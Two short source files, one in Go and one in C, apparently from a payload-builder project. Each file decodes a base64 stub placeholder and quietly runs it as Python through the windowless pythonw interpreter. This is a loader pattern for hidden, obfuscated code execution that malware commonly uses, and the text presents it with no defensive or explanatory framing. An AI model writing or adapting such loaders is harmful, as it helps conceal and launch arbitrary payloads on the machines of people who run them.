File: native_loaders/loader.go
package main

import (
	"os/exec"
	"encoding/base64"
)

func main() {
	payload := "<BASE64_STUB_CODE>"
	code, _ := base64.StdEncoding.DecodeString(payload)
	cmd := exec.Command("pythonw", "-c", string(code))
	cmd.Start()
}

File: native_loaders/loader.c
#include <windows.h>
#include <stdio.h>

int main() {
    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi;
    char cmd[] = "pythonw.exe -c \"exec(__import__('base64').b64decode('<BASE64_STUB_CODE>'))\"";

    if (!CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        return 1;
    }
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return 0;
}
